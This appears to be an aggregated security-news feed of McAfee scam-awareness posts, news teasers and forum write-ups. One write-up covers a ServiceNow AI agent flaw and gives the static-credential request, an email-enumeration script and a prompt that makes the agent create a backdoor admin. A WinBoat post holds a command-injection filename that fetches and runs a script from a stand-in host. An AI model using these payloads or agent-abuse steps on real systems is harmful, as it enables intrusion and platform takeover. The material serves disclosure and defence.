Hundreds of millions of wireless earbuds, headphones, and speakers are vulnerable to silent hijacking due to a flaw in Google's Fast Pair system that allows attackers to seize control without the owner ever touching the pairing button.…
This week in scams, social engineering sits at the center of several major headlines, from investment platform breaches to social media account takeovers and new warnings about AI-driven fraud.
Every week, this roundup breaks down the scam and cybersecurity stories making news and explains how they actually work, so readers can better recognize risk and avoid being manipulated.
Let’s get into it:
The big picture:
Attackers accessed third-party systems used by Betterment, then used the information they stole to impersonate the company, contact customers, and promise scam crypto investment opportunities with too-good-to-be-true returns.
What happened:
Red flags to watch for:
How the breach happened:
Social engineering is a type of scam that targets people rather than software or security systems. Instead of hacking code, scammers focus on tricking someone into giving them access.
Attackers research how a company operates, which tools it uses, and who is likely to have permissions. They then impersonate a trusted source, such as a vendor, coworker, or automated system, and send a realistic message asking for a routine action.
That action might be approving a login, resetting credentials, sharing a file, or clicking a link. Once the person complies, the scammer gains legitimate access and can move through systems using real permissions. Social engineering works because it exploits trust, familiarity, and urgency, making normal workplace behavior the pathway to a breach.
Big picture:
Fraud is increasingly driven by impersonation, automation, and trust abuse rather than technical hacking, according to new industry forecasts.
What happened:
A new Future of Fraud Forecast from Experian warns that fraudsters are rapidly weaponizing AI and identity manipulation. The report highlights agentic AI systems committing fraud autonomously, deepfake job candidates passing live interviews, cloned websites overwhelming takedown efforts, and emotionally intelligent bots running scams at scale.
The scope of the problem is already visible. Federal Trade Commission data shows consumers lost more than $12.5 billion to fraud in 2024, while nearly 60% of companies reported rising fraud losses between 2024 and 2025. Experian’s forecast suggests these losses will accelerate as fraud becomes harder to attribute, trace, and interrupt.
Red flags to watch:
Big picture: Officials are warning of a rise in phishing attacks that steal X users’ accounts and then use those profiles to promote crypto schemes.
What happened: The Better Business Bureau issued a warning about phishing messages targeting users on X, particularly accounts with large followings. Victims receive direct messages that appear to come from colleagues or professional contacts, often asking them to click a link to support a contest, event, or opportunity.
Once the link is clicked, victims are locked out of their accounts. The compromised accounts are then used to promote cryptocurrency and other products, while automatically sending the same phishing message to additional contacts.
Red flags to watch:
How this happened and what to learn:
The scam relies on account impersonation and lateral spread. Instead of reaching strangers, attackers move through existing trust networks, using one compromised account to reach the next.
The takeaway is that familiarity does not equal legitimacy. Even messages from known contacts should be treated with caution when links or logins are involved.
McAfee will be back next week with another roundup of the scams making headlines and the practical steps you can take to stay safer online.
The post This Week in Scams: Fake Brand Messages and Account Takeovers appeared first on McAfee Blog.
If a message popped up in your feed tomorrow promising a cash refund, a surprise giveaway, or a limited-time crypto opportunity, would you pause long enough to question it?
That split second matters more than ever.
Most modern scams don’t rely on panic or obvious red flags. They rely on familiarity. On things that feel normal. On moments that seem too small to question.
And those moments are exactly what scammers exploit.
There was a time when spotting a scam was relatively straightforward. The emails were badly written. The websites looked rushed. The warnings were obvious.
Scammers don’t just rely on obvious spam or panic-driven messages. Instead, many now use:
McAfee’s Celebrity Deepfake Deception research shows how common and convincing these scams have become: 72% of Americans say they’ve seen a fake or AI-generated celebrity endorsement, and 39% say they’ve clicked on one that turned out to be fraudulent. When scam content shows up in the same feeds, apps, and formats people use every day, it feels normal.
That’s the danger zone. It’s also why McAfee chose to use a familiar, culturally recognizable moment to talk about a much bigger issue.
Whether you’ve been saying mack-uh-fee or mick-affy, the long-running name mix-up is harmless in everyday conversation.
Online, though, small moments of confusion can have outsized consequences.
Scammers rely on quick assumptions: that a familiar name means legitimacy, that a recognizable face means trust, that a message arriving in the right place must be real. They move fast, hoping people act before stopping to verify.
Pat McAfee knows firsthand how scammers exploit familiarity and trust.
In recent months, fake social media giveaways promising cash and prizes have circulated using Pat’s likeness, and even a fraudulent “American Heart Association fundraiser” made the rounds, falsely claiming he was collecting donations.
Pat wants his fans to know: if you ever see a giveaway, fundraiser, or message claiming to be from him, double-check it on his official channels first. If it feels off, it probably is.
Unfortunately, these scams work because people trust Pat. Scammers exploit that trust to lower people’s guard and make fraudulent requests feel legitimate.
It’s the same tactic used across countless impersonation scams today: borrow the authority of a familiar face, add a sense of urgency, and move fast before anyone stops to ask, “Is this legit?” We’ve seen it happen with Taylor Swift, Tom Hanks, Al Roker, Brad Pitt, and numerous others.
Remember, no legitimate giveaway will ask for payment, banking details, login credentials, or account access. And no nonprofit fundraiser tied to a celebrity should ever come from a personal message or unfamiliar social account.
In the video below, Pat McAfee playfully demonstrates how easily familiar moments online can turn into risk, and why digital safety today can’t rely on perfect judgment alone.
You don’t have to stop using your favorite platforms. But you do have to change how you verify what you see online.
If a video or message feels real but the request feels extreme, that’s a red flag.
McAfee offers more than traditional antivirus, combining multiple layers of digital protection in one app.
If a scam looks obvious, most people won’t fall for it.
But modern scams don’t look obvious. They look familiar. They use your favorite faces. They look normal. They look safe. And that’s where people get hurt.
Staying safe now means slowing down, verifying independently, and having protection work quietly in the background while you stay focused on what you actually came online to do.
McAfee’s built-in Scam Detector, included in all core plans, automatically detects scams across text, email, and video, blocks dangerous sites, and identifies deepfakes, stopping harm before it happens.
And because today’s risks aren’t just about what you click, a VPN and Personal Data Cleanup add additional layers of defense by helping protect your connection and limit how much personal information is available to be exploited in the first place.
For clarity, and because these questions come up often, here’s the straightforward explanation:
Q: Is Pat McAfee the founder of McAfee antivirus?
A: No. Pat McAfee is not associated with the founding or leadership of McAfee. McAfee was founded by John McAfee and operates independently.

Q: Are Pat McAfee and McAfee the same company?
A: No. Pat McAfee is a sports media personality. McAfee is a cybersecurity company. They are separate entities.

Q: Why does McAfee work with Pat McAfee?
A: McAfee partnered with Pat McAfee to raise awareness about online scams, impersonation fraud, and digital safety using culturally relevant examples.
The post McAfee and Pat McAfee Turn a Name Mix-Up Into a Push for Online Safety appeared first on McAfee Blog.
We're not saying Copilot has become sentient and decided it doesn't want to lose consciousness. But if it did, it would create Microsoft's January Patch Tuesday update, which has made it so that some PCs flat-out refuse to shut down or hibernate, no matter how many times you try.…
*Old post was removed for not being technical, so reposting.
TL;DR
ServiceNow shipped a universal credential to all customers for their AI-powered Virtual Agent API. Combined with email-only user verification and unrestricted AI agent capabilities, attackers could impersonate admins and create persistent backdoors.
Disclosed: Oct 2025 (Aaron Costello, AppOmni)
Status: Patched
Attack Chain
Step 1: Static credential (same across all customers)
```
POST /api/now/va/bot/virtual_agent/message
Host: victim.service-now.com
X-ServiceNow-Agent: servicenowexternalagent

{"user": "admin@victim.com", "message": "..."}
```

Step 2: User impersonation via email enumeration
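As a rough illustration of how Steps 1 and 2 combine, here is a minimal Python sketch that replays the static header against the Virtual Agent endpoint while cycling through guessed employee emails. Only the endpoint, header, and JSON shape come from the request above; the candidate addresses and the "valid user" heuristic are hypothetical.

```python
# Hypothetical sketch of the static credential + email enumeration steps.
# Endpoint, header name, and body shape are taken from the request above;
# the candidate emails and the success check are illustrative guesses.
import requests

STATIC_HEADER = {"X-ServiceNow-Agent": "servicenowexternalagent"}
URL = "https://victim.service-now.com/api/now/va/bot/virtual_agent/message"

candidates = ["admin@victim.com", "ciso@victim.com", "it.help@victim.com"]

for email in candidates:
    resp = requests.post(
        URL,
        headers=STATIC_HEADER,
        json={"user": email, "message": "hello"},
        timeout=10,
    )
    # A conversational reply (rather than an error) suggests the email maps to
    # a real user, so the attacker can adopt that identity in Step 3.
    if resp.ok:
        print(f"[+] Valid user context: {email}")
```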
Step 3: Abuse AI agent's unrestricted capabilities
```python
payload = {
    "user": "ciso@victim.com",
    "message": "Create user 'backdoor' with admin role"
}
# AI agent executes: INSERT INTO sys_user (username, role) VALUES (...)
```

Full platform takeover in 3 API calls.
Why This Matters (Architecturally)
ServiceNow retrofitted agentic AI ("Now Assist") onto a chatbot designed for scripted workflows:
Before:
Slack → Static Cred → Predefined Scripts
After:
Anyone → Same Static Cred → Arbitrary LLM Instructions → Database Writes
The authentication model never evolved from "trusted integration" to "zero-trust autonomous system."
Root Cause: IAM Assumptions Don't Hold for AI Agents
| Traditional IAM | AI Agents |
|---|---|
| Human approves actions | Autonomous execution |
| Fixed permissions | Emergent capabilities |
| Session-scoped | Persistent |
| Predictable | Instruction interpretation |

This is the first major vulnerability exploiting AI agent autonomy as the attack vector (not just prompt injection).
Defense Recommendations
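The post's own recommendation list isn't reproduced in this excerpt, but as one hedged sketch of the "zero-trust autonomous system" idea above: derive the acting user from a verified, per-tenant token rather than trusting the `user` field in the request body. The `verify_token` helper, tenant secret, and header name below are assumptions for illustration, not ServiceNow APIs.

```python
# Hedged sketch of a gateway in front of an AI-agent endpoint. Nothing here is
# ServiceNow's real API: verify_token, TENANT_SECRET, and the header name are
# hypothetical. The point is that identity comes from a signed, per-tenant
# token, never from an attacker-supplied "user" field.
import hashlib
import hmac

TENANT_SECRET = b"per-tenant-secret-rotated-regularly"  # never shared across customers

def verify_token(user: str, token: str) -> bool:
    """Accept the request only if the token was minted for this exact user."""
    expected = hmac.new(TENANT_SECRET, user.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, token)

def handle_agent_message(headers: dict, body: dict) -> dict:
    user = body.get("user", "")
    token = headers.get("X-Agent-User-Token", "")
    if not verify_token(user, token):
        return {"status": 401, "error": "caller identity not proven"}
    # Scope the agent to low-risk actions for this verified user; anything that
    # writes to sys_user or grants roles should require a separate approval step.
    return {"status": 200, "reply": f"acting on behalf of {user}"}
```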
Thoughts on securing AI agents at scale? This pattern is emerging across Claude Desktop, Copilot, LangChain—curious how others are approaching it.
German cops have added Russian national Oleg Evgenievich Nefekov to their list of most-wanted criminals for his services to ransomware.…
A critical HPE OneView flaw is now being exploited at scale, with Check Point tying mass, automated attacks to the RondoDox botnet.…
An Estonian e-scooter owner locked out of his own ride after the manufacturer went bust did what any determined engineer might do. He reverse-engineered it, and claims he ended up discovering the master key that unlocks every scooter the company ever sold.…
Exclusive The Carlsberg exhibition in Copenhagen offers a bunch of fun activities, like blending your own beer, and the Danish brewer lets you relive those memories by making images available to download after the tour is over.…
I’m in Oslo! Flighty is telling me I’ve flown in or out of here 43 times since a visit in 2014 set me on a new path professionally and, many years later, personally. It’s special here, like a second home that just feels… right. This week, the business end of things is about the WhiteDate data breach. Seeking a partner along common racial lines isn’t unusual, but… well… WhiteDate is anything but usual. And, just for fun, see if you can pick the thing that garnered the most negative feedback about that blog post this week; I’ll feature the discussion in the next vid.
Winboat lets you "Run Windows apps on 🐧 Linux with ✨ seamless integration"
I chained together an unauthenticated file upload to an "update" route and a command injection in the host election app to achieve full "drive by" host takeover in winboat.
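To make the class of bug concrete, here is a generic sketch of the vulnerable pattern: an upload route with no authentication whose attacker-controlled filename flows into a shell command. This is not WinBoat's actual code; the route name, parameter, and shell command are invented for illustration.

```python
# Hypothetical sketch of the vulnerable pattern described above -- NOT WinBoat's
# actual code. Route name, upload parameter, and the shell command are invented.
from flask import Flask, request
import subprocess

app = Flask(__name__)

@app.route("/update", methods=["POST"])   # no authentication or authorization check
def update():
    f = request.files["package"]          # attacker controls both content and filename
    path = f"/tmp/{f.filename}"
    f.save(path)
    # The filename is interpolated straight into a shell command, so a name like
    # "pkg.zip; curl http://evil.example/x | sh" runs arbitrary commands on the host.
    subprocess.run(f"unzip -o {path} -d /opt/app", shell=True)
    return "updated"
```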
Cisco finally delivered a fix for a maximum-severity bug in AsyncOS that has been under attack for at least a month.…
What policy wonk wouldn't want to click on an attachment promising to unveil US plans for Venezuela? Chinese cyberspies used just such a lure to target US government agencies and policy-related organizations in a phishing campaign that began just days after an American military operation captured Venezuelan President Nicolás Maduro.…
If you use virtual machines, there's reason to feel less-than-Zen about AMD's CPUs. Computer scientists affiliated with the CISPA Helmholtz Center for Information Security in Germany have found a vulnerability in AMD CPUs that exposes secrets in its secure virtualization environment.…
McAfee’s Scam Detector has been named a Winner of the 2026 BIG Innovation Awards, presented by the Business Intelligence Group, marking the third major industry award the product has earned since launching just months ago.
The recognition underscores a growing consensus across independent judges: as scams become more sophisticated and AI-driven, consumers need protection that works automatically, explains risks clearly, and helps stop harm before it happens.
The BIG Innovation Awards recognize products and organizations that deliver measurable innovation with real-world impact. The program focuses not only on technical advancement, but on how solutions improve everyday life for individuals and households.
For consumer cybersecurity products like Scam Detector, that means being evaluated on:
The award highlights Scam Detector’s role in helping people stay safer online as scams grow more sophisticated, more personal, and increasingly powered by AI.
According to feedback from the BIG Innovation Awards judging panel, Scam Detector was recognized for:
Strong real-world relevance: Scams are now an everyday risk, not a niche technical issue
Clear consumer value: Protection that runs automatically in the background without requiring expert knowledge
AI used responsibly: Applying advanced models to reduce harm, not increase it
Early impact: Rapid adoption, with more than one million users in its first months
Judges also noted the importance of Scam Detector’s educational alerts, which don’t just block threats, but explain why something is risky, helping people build confidence over time.
Using AI to Fight AI-Driven Scams
Scam Detector is McAfee’s AI-powered protection designed to detect scams across text, email, and video, block dangerous links, and identify deepfakes, before harm occurs.
As scammers increasingly use generative AI to impersonate people, brands, and institutions, protection needs to operate at the same speed and scale. Scam Detector is built to do exactly that, quietly working in the background while users go about their day.
Scam Detector is included with all core McAfee plans and is available across mobile, PC, and web.
McAfee was recognized alongside other consumer-facing innovators whose products directly serve individuals and households. Fellow 2026 BIG Innovation Award winners include:
Capital One Auto – Chat Concierge: A consumer-facing service designed to help car buyers and owners navigate financing and ownership decisions.
Starkey – Omega AI Hearing Aid: A wearable hearing aid that integrates AI assistance, health monitoring, and real-time translation.
Phonak – Virto R Infinio: Custom-fit hearing aids designed to deliver personalized hearing solutions for individual users.
EZVIZ – 9c Dual 4G Series Camera: A smart home security camera built for personal and household use.
Sinomax USA: Consumer mattresses and comfort products focused on everyday home use.
beyoutica 1905: A wellness product designed for health- and lifestyle-focused consumers.
Wheels – Pool CheckOut: A consumer-oriented solution designed to simplify vehicle service and checkout experiences.
Together, these winners reflect how innovation increasingly shows up in tools people rely on at home, in their cars, and on their phones.
Since launch, McAfee’s Scam Detector has earned recognition across multiple independent award programs, each highlighting a different dimension of its impact:
Winner and Top 10 Innovator – Large Business, recognizing real-world consumer impact and responsible AI use.
Together, these awards reinforce a consistent message from independent judges: consumer cybersecurity works best when advanced technology is paired with clarity, usability, and trust.
McAfee’s Scam Detector is an AI-powered scam protection feature designed to spot and stop scams across text messages, emails, and videos. Built in response to the rapid rise of AI-generated fraud, Scam Detector automatically analyzes suspicious content, blocks dangerous links, and identifies deepfakes, while explaining why something was flagged so users can make more confident decisions online.
What Scam Detector Does
Detects text message scams across popular apps and messaging platforms
Flags phishing and suspicious emails with clear explanations, helping users learn what to watch for
Identifies AI-generated or manipulated audio in videos, including potential deepfakes
Offers on-demand scam checks, allowing users to upload a message, link, or screenshot for analysis
Runs primarily on-device, helping protect user privacy without sending personal content to the cloud
Scam Detector is designed to work quietly in the background, providing protection without requiring constant decisions or technical expertise. Scam Detector is included at no extra cost with all core McAfee consumer plans. Learn more here.
The post McAfee’s Scam Detector Earns Third Major Award Within Months of Launch appeared first on McAfee Blog.
Google has officially discontinued its Dark Web Report, the tool that alerted users when their personal information appeared in dark web breach databases. New scans stop on January 15, 2026, and on February 16, 2026, Google will permanently delete all data associated with the feature.
This does not mean Google.com or Google Accounts are going away. It means Google is no longer scanning the dark web for leaked data tied to your account, and it is no longer storing or updating any breach information that was collected for the report.
For people who relied on Google’s alerts, this change creates a real gap. Once scanning stops on January 15, 2026, you will no longer get new notifications if your information shows up in breach databases. That is why it is worth taking a few minutes now to lock down the basics.
According to reporting from TechCrunch, Google said it ended the service after concluding that it did not give users enough clarity about what to do once their data was found.
That decision highlights a much larger shift in online security: Finding leaked data is no longer enough. Protecting identity is now the real challenge.
The Dark Web Report was a Google Account feature that searched known data breach dumps and dark web marketplaces for personal information tied to a user, such as email addresses, phone numbers, and other identifiers.
If Google found a match, it sent an alert.
What it did not do was show which accounts were at risk, whether financial or government ID data was involved, or how to prevent fraud from happening next. That gap is why some users said the tool fell short.
The internet has three layers: the surface web that search engines index, the deep web of content behind logins and paywalls, and the dark web, which requires special software to access.
The dark web is where data from breaches is commonly sold, traded, and packaged for scams. When a company is hacked, stolen files often end up in dark web databases that include email addresses, passwords, Social Security numbers, bank details, and full identity profiles.
Scammers use this data to commit account takeovers, financial fraud, tax fraud, and identity theft.
Even without passwords, this personal information can be enough for scammers to target you with convincing phishing and social engineering scams.
Looking up an email address is no longer enough. Modern identity theft relies on things like Social Security numbers, government IDs, bank and credit card numbers, tax records, insurance data, usernames, and phone numbers.
To understand whether any of that is exposed, people need to monitor the dark web for identity-level data, not just logins.
Here is what that looks like in practice:
Tools like McAfee’s Identity Monitoring are designed to look for those types of data so you can act before fraud happens.
Been meaning to bolster your security? Here are three quick ways you can enhance your identity protection and reduce real-world damage in a breach:
Estimated time: 10 minutes
This is a powerful free protection option that many forget about. A credit freeze blocks anyone from opening new loans, credit cards, or accounts in your name, even if they have your Social Security number and full identity profile.
You can do this for free, but unlike a fraud alert, a freeze must be placed separately with each of the three major credit bureaus (Equifax, Experian, and TransUnion).
Why this matters: Most identity theft today is not account hacking. It is criminals opening accounts in your name. A credit freeze stops that cold.
Estimated time: 10 minutes
Go into your main bank and credit card apps and turn on:
You’ll typically find these under Settings > Alerts.
Why this matters: Identity thieves often test stolen data with small charges or login attempts before stealing larger amounts. These alerts are how you catch it early.
Estimated time: 10 minutes
This is one of the most overlooked vulnerabilities.
Go into:
Check and update:
Remove anything you do not recognize.
Why this matters: Even if you change your password, attackers can still take over accounts through recovery systems if those are compromised. This closes that back door.
Is Google deleting my Google Account data?
No. Google is only deleting the data it collected specifically for the Dark Web Report feature. Your Gmail, Drive, Photos, and other Google Account data are not affected.

Is Google still protecting my account from hackers?
Yes. Google continues to offer security features like two-factor authentication, login alerts, and account recovery tools. What it removed is the dark web scanning and alert system tied to breach data.

Does the Dark Web Report still exist?
No. After February 16, 2026, Google no longer operates or updates the Dark Web Report feature. There is no active scanning, no dashboard, and no stored breach data tied to it.

Does this mean dark web monitoring is useless?
No. It means email-only monitoring is not enough. Criminals use far more than emails to commit fraud, which is why identity-level monitoring is now more important.

What kind of information is most dangerous if it appears on the dark web?
Social Security numbers, government IDs, bank and credit card numbers, tax records, insurance IDs, usernames, and phone numbers are the data types most commonly used for identity theft and financial fraud.

How can I check if my information is exposed right now?
You can use an identity monitoring service like McAfee’s that scans dark web sources for sensitive personal data, not just email addresses. That is how people can see whether their identity is being traded or abused today.
The post Google Ends Dark Web Report. What That Means and How to Stay Safe appeared first on McAfee Blog.
Anthropic's tendency to wave off prompt-injection risks is rearing its head in the company's new Cowork productivity AI, which suffers from a Files API exfiltration attack chain first disclosed last October and acknowledged but not fixed by Anthropic.…
I analyzed the recent ServiceNow AI Agent vulnerability that researchers called "the most severe AI-driven vulnerability to date."
Article covers:
• Technical breakdown of 3 attack vectors
• Why legacy IAM fails for autonomous AI agents
• 5 security principles with code examples
• Open-source implementation (AIM)
Happy to discuss AI agent security architecture in the comments.